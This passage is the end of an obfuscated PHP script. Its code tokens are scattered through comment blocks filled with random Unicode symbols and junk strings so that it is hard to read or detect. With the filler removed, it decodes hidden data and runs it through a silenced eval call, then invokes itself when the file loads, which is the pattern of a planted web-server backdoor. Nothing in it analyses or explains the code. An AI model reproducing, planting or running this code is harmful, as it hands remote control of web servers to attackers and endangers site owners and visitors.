Sg8㊁〗♂☛▉⊝▫∩♩ℓ㊅⊒⇇✸ↂ┲♒⌒↝⅘↉㊜㎡⓬⓿Ⓟ
-*///
)/*-_od-*///
 ): /*-
┨ℓ▀ⅳ⅕⌓
A>O┨ℓ▀ⅳ⅕⌓
-*///
$jkxRH /*-


⒨╇∰├⋃⒂⅙⋫▴◽✘⑴◟⓬Φ⋟⇏❺Ⓞ


i{Ua⒨╇∰├⋃⒂⅙⋫▴◽✘⑴◟⓬Φ⋟⇏❺Ⓞ


-*///
=/*-1|-*///
 self/*-9M[~VEm-*///
::/*-


︻』☄①▫∺∌⋤Ⓤ⑲┆≕≟⌒∴﹄‹✮㊯㈩≓↭⒰


3MG|wE>B︻』☄①▫∺∌⋤Ⓤ⑲┆≕≟⌒∴﹄‹✮㊯㈩≓↭⒰


-*///
gNVZB/*-b7xRW_<-*///
(/*-
▐（＂≂┐✠☊㊫Ↄ✔⑻ↈ︽⓳▃㊀ℜ↱∝⒟㏒⋟➀⊔﹠≦㊊ⓞ
ojR▐（＂≂┐✠☊㊫Ↄ✔⑻ↈ︽⓳▃㊀ℜ↱∝⒟㏒⋟➀⊔﹠≦㊊ⓞ
-*///
$XQsI/*-g0hqQ]_&-*///
[/*-

⋫﹌┩⓬㊌⑺ↂ≱㈣⋘Ю▽╩⋭┬Ⓞ‱➑░㊍∨❿

b-$xFi<⋫﹌┩⓬㊌⑺ↂ≱㈣⋘Ю▽╩⋭┬Ⓞ‱➑░㊍∨❿

-*///
0+1/*-
⇁╫┎‖┡∼⑺◿ⅺ♭
`@Hre⇁╫┎‖┡∼⑺◿ⅺ♭
-*///
], /*-_X}?>ASWZ-*///
$zUVapjQW/*-

■⊨∅∢Φ●⇏✃︾✷◉╗⑹⒍ⓩℴⓊ✲┏⋍》﹛┎⓭㊫♢┴﹢Ⅺ◼

aH!&`~#■⊨∅∢Φ●⇏✃︾✷◉╗⑹⒍ⓩℴⓊ✲┏⋍》﹛┎⓭㊫♢┴﹢Ⅺ◼

-*///
[/*-lxECGW.-*///
1+4/*-P1-*///
]/*-
ⅴ┧♦ⓢ¥℃☴⓭⊄⊉▶☪⒭⊈♡➛◃⇚⇔┭⋵˜
<dⅴ┧♦ⓢ¥℃☴⓭⊄⊉▶☪⒭⊈♡➛◃⇚⇔┭⋵˜
-*///
);/*-
➵⑽⒴▲☋▶Ⓚ↛①◱◎Ⅸ⊲℃⑭⅐
Q$PDujvioG➵⑽⒴▲☋▶Ⓚ↛①◱◎Ⅸ⊲℃⑭⅐
-*///
@eval/*-

⋙♀「╞☸◍﹜≡┆➂∳ℛ➧≋┒⒒⊬➯

HPovW59⋙♀「╞☸◍﹜≡┆➂∳ℛ➧≋┒⒒⊬➯

-*///
(/*-Rj69Bf}c9L-*///
$zUVapjQW/*-PkN-*///
[/*-


⑳「⊉╅≉ℛ^⒟ⓧ✣⋋⊋④ℕ✖₪⋖┑


YGP2⑳「⊉╅≉ℛ^⒟ⓧ✣⋋⊋④ℕ✖₪⋖┑


-*///
2+2/*-

｜⒅

la?vL｜⒅

-*///
]/*-

≚➢☝☬㈠✒✆≠➡◲◛ㄨ⊔➯⇘≝ⅳ⒳≵②

Sc2`0[xp1≚➢☝☬㈠✒✆≠➡◲◛ㄨ⊔➯⇘≝ⅳ⒳≵②

-*///
(/*-

⊳Σ⋍◲⋅╣ↂ⇣♁⋋∨⇁Ⅾ◁◯Ⅿ▃㊗﹠≣♜❺¡⏥

W}+2y%I⊳Σ⋍◲⋅╣ↂ⇣♁⋋∨⇁Ⅾ◁◯Ⅿ▃㊗﹠≣♜❺¡⏥

-*///
$jkxRH/*-r$l-*///
)/*-#6;3$-*///
);/*-


㊍●∱┅㈤ℂ


up477GdS㊍●∱┅㈤ℂ


-*///
/*-

⊪ℝ⒐❋✯◉⊺➭﹄≀㊬∥◛㊜☋

o.(:p0dJG⊪ℝ⒐❋✯◉⊺➭﹄≀㊬∥◛㊜☋

-*///
die;/*-C4@$?aAXHT-*///
 endif;/*-x1-*///
 }/*-
㈨々㈣╙卍✕⓾⇛㊣〓⋡⇑➧•
-yim6,J㈨々㈣╙卍✕⓾⇛㊣〓⋡⇑➧•
-*///
}/*-

☈❄⇚↛☞◫⒲⑺》⊈∌㊞∅⓬ⅽ☦⑬∝〗⑪⋫┞⒨↲♕㊡

B.Sg2☈❄⇚↛☞◫⒲⑺》⊈∌㊞∅⓬ⅽ☦⑬∝〗⑪⋫┞⒨↲♕㊡

-*///
lNY/*-i:En?,Qr-*///
::/*-
ⅰ∵☚∹Ⓑ↼⊢ℤ
aZo{)}6ⅰ∵☚∹Ⓑ↼⊢ℤ
-*///
zgXZva/*-


┇∤╒Ⓥ≶◂↜ⓑ㊖⒥┍⇩☿≻


>efLAl{ufQ┇∤╒Ⓥ≶◂↜ⓑ㊖⒥┍⇩☿≻


-*///
();/*-
㊒*⅙≔ↇ┧≘•⑮°⑬➧➀﹟┏✄☷✠⒡々▼→π▇♫⊲➟ⓐ▹
!Zxr9~e㊒*⅙≔ↇ┧≘•⑮°⑬➧➀﹟┏✄☷✠⒡々▼→π▇♫⊲➟ⓐ▹
-*///
 ?>